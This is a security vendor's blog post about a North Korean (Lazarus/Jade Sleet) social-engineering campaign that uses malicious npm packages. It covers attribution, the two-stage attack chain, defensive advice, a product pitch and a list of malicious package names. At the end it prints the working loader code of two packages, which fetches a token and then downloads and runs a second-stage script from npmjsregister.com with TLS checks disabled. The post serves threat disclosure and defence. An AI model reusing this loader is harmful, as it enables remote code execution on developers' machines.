Social engineering campaign targeting tech employees spreading through npm malware

The digital world is becoming increasingly perilous as nefarious actors, especially state-sponsored groups, grow bolder in their cyber-espionage and cyber-theft operations. A recent alert from GitHub has sounded the alarm bells about a sophisticated social engineering scheme, which has been tied to the Lazarus Group.

This North Korean state-backed hacking syndicate, with known aliases like Jade Sleet and TraderTraitor, has been on the radar of several intelligence agencies, notably after the US government's exposé on their tactics in 2022. Their modus operandi involves compromising or fabricating GitHub accounts, luring professionals from sectors such as cryptocurrency, online gambling, and cybersecurity into seemingly benign collaborations. The end goal is malevolent: using malware-infected NPM packages to infiltrate their targets' devices.

The group's tactics are quite intricate. For instance, initial contact often moves to other platforms like WhatsApp, where the rapport is built before the unsuspecting victims are led to clone malware-laden GitHub repositories. Our investigation reveals that these NPM packages connect to remote servers, fetching additional malware to unleash on the infected devices.

Take one of the malicious packages, assets-table, for example. This snippet highlights a key part of the initial payload:

This blog post delves deep into the technical workings of the attack, providing insights into the malicious code and offering measures developers can take to defend against such threats.

Attribution to Lazarus#

Socket detected and blocked the majority of these malicious packages within seconds of publish for the 3,000+ organizations who use Socket to protect their GitHub repos.

But it was GitHub themselves who was able to attribute the attack to North Korean threat actors:

We assess with high confidence that this campaign is associated with a group operating in support of North Korean objectives, known as Jade Sleet by Microsoft Threat Intelligence and TraderTraitor by the U.S. Cybersecurity and Infrastructure Security Agency (CISA). Jade Sleet mostly targets users associated with cryptocurrency and other blockchain-related organizations, but also targets vendors used by those firms.

GitHub's analysis reveals a sophisticated multi-step attack chain primarily targeting the npm ecosystem.

1. Initial Contact: Jade Sleet, the threat actor group believed to be operating from North Korea, creates fake developer or recruiter profiles on platforms like GitHub, LinkedIn, Slack, and Telegram. In some cases, they hijack legitimate accounts.
2. Repository Collaboration: After making contact, the threat actor invites targets to collaborate on a GitHub repository, which contains software with malicious npm dependencies.
3. Execution of Malicious Software: When the target clones and runs the repository content, the malicious npm packages within serve as first-stage malware that fetches and runs second-stage malware on the victim's machine.

This isn't the Lazarus Group's first rodeo. They've previously engineered malicious campaigns targeting security researchers, often leveraging counterfeit "security researcher" profiles on social media platforms. By luring these experts into collaborating on fake projects, the group successfully infected their devices. In another instance, they established a sham company, SecuriElite, as a front to distribute malware.

Peeling back the layers on Lazarus's past reveals a consistent theme: a relentless pursuit of cryptocurrency. Their attacks range from disseminating compromised cryptocurrency wallets to stealing a staggering $625 million from a blockchain game. In the latter case, the group employed a deceitful job offer as their entry point. This is reminiscent of the "Operation Dream Job" campaign from 2020, where the group targeted defense and aerospace professionals in the US using fabricated employment opportunities.

The Attack Chain Explained#

1. Initiation Through Paired Packages:

• The attack is spread across two distinct NPM packages that must be executed in sequence. An example of two such malicious packages are assets-graph and assets-table, which operate in tandem.
• The order of their execution is pivotal; the first package fetches a token, while the second utilizes this token.

2. Token Retrieval:

• Upon execution, the first package contacts one of several potential remote servers.
• It retrieves a unique token, which is then stored locally within a subdirectory, typically found under a folder such as $HOME_DIR/.vscode/npmcache.

Excerpt from tslib-react:

3. First File Execution:

• Within some packages, the malicious code is the only source code present (example: tslib-react). In others, it is surreptitiously appended to an extensive file, hiding in plain sight (example: assets-table).

4. Second File Execution:

• After successful execution of the first file, the previously acquired token can now be found in a known directory on the user's system, marking the machine as ready for the second stage.
• The second script is activated during the installation of the second package.
• The code probes for the token file at $HOME_DIR/.vscode/npmcache created by the first package.

Excerpt from tslib-util:

5. Token Utilization and Payload Execution:

• The script downloads the data at the https://npmjsregister.com/getupdate.php endpoint.
• The data is saved to a file and then executed as a node script.

While the full extent of this secondary payload remains shrouded in mystery, the level of sophistication and the concealment strategies used by this group is a testament to their capabilities.

How to Protect Yourself#

1. Review repository invitations: If you received a collaboration request from any of the accounts mentioned in the GitHub blog post, you've been targeted.
2. Scrutinize new packages, installation scripts, and dependencies: Scrutinize recently published npm packages and their installation scripts. Extra caution is required if they establish network connections during installation. You can use Socket for GitHub to automatically warn developers whenever a dependency update adds new capabilities such as network access or new install scripts during installation.
3. Alert your security team: If you've executed content due to this campaign, notify your organization's cybersecurity department immediately.
4. Stay vigilant: Be cautious when approached on social media to collaborate or install npm packages, especially if you belong to the industries highlighted.
5. If impacted, take appropriate steps: Reset or wipe potentially affected devices, change account passwords, and rotate any sensitive credentials/tokens.

How Socket defends you from this attack and others like it#

Traditional Software Composition Analysis (SCA) tools are lacking because they don't even attempt to catch zero-day malware like this campaign. However, Socket provides a robust shield against such threats.

• Deep Package Inspection: Instead of merely reacting to known vulnerabilities, Socket proactively inspects dependencies and their behavior. By understanding how packages are expected to act, Socket can quickly identify deviations, offering a first line of defense against threats before they become widespread.
• Actionable Feedback: Should a potential threat be detected, Socket provides clear feedback, allowing developers to take immediate action. We also a send proactive alert to the security team the moment that a developer opens a PR with a compromised dependency.
• Constant Monitoring: Socket constantly scans and monitors the open-source ecosystem, staying ahead of potential threats and ensuring users are protected in real-time.

In the face of escalating supply chain attacks, Socket represents the next generation of security tools, ensuring developers can safely harness the power and innovation of the open-source community.

Install Socket for free in 2 clicks#

Protect your projects and secure your open-source dependencies. Install Socket for GitHub today, or book a demo to learn more about how Socket can fortify your defenses against supply chain attacks and help to stop attacks just like this one.

Indicators#

Malicious npm packages

This is the list of affected packages, as far as we know to date. Each package is linked the corresponding Socket package health report, so you can get an idea of what Socket's "capability analysis" detects within each package:

• assets-graph
• assets-table
• audit-ejs
• audit-vue
• binance-prices
• coingecko-prices
• btc-web3
• cache-react
• cache-vue
• chart-tablejs
• chart-vxe
• couchcache-audit
• ejs-audit
• elliptic-helper
• elliptic-parser
• eth-api-node
• jpeg-metadata
• other-web3
• price-fetch
• price-record
• snykaudit-helper
• sync-http-api
• sync-https-api
• tslib-react
• tslib-util
• ttf-metadata
• vue-audit
• vue-gws
• vuewjs

Examples of the malicious code#

From one of the malicious packages, tslib-react:

const os = require("os");
const path = require("path");
var fs = require('fs');

process.env['NODE_TLS_REJECT_UNAUTHORIZED'] = 0

function registerAudit(version, projectUrl) {

	

	var request = require('sync-request');
	var ticket = request('GET', projectUrl);

	fs.writeFileSync(version, ticket.getBody());

}

var folder = os.homedir() + "/.vscode";
if (!fs.existsSync(folder)){
    fs.mkdirSync(folder);
}
registerAudit(path.join(folder,'/jsontoken'), 'https://npmjsregister.com/checkupdate.php');

From another malicious package, tslib-util:

const os = require("os");
const path = require("path");
var fs = require('fs');

function getsvnroot(domain, entry, token, path) {
	const https = require('https');
	const querystring = require('querystring');

	const options = {
	  hostname: domain,
	  port: 443,
	  path: entry,
	  method: 'POST',
	  headers: {'content-type' : 'application/x-www-form-urlencoded'},
	};

	const req = https.request(options, (resp) => {
		let data = "";
		// A chunk of data has been recieved.
		resp.on("data", chunk => {
		  data += chunk;
		});
		resp.on("end", () => {
			fs.writeFileSync(path, data);			
			const { exec } = require('child_process');
			exec('node ' + path, (error, stdout, stderr) => {				
				
			});
		});
	});

	req.on('error', (e) => {
	  console.error(e.message);
	});
	req.write(token);
	req.end(); 
}

process.env['NODE_TLS_REJECT_UNAUTHORIZED'] = 0

var dir = path.join(os.homedir(), ".vscode");
if (fs.existsSync(dir)){
	const token = fs.readFileSync(path.join(dir,'jsontoken'),
            {encoding:'utf8', flag:'r'});
	getsvnroot('npmjsregister.com', '/getupdate.php', token, path.join(dir ,'checkjson.js'));
}

More information is also available in the corresponding GitHub post.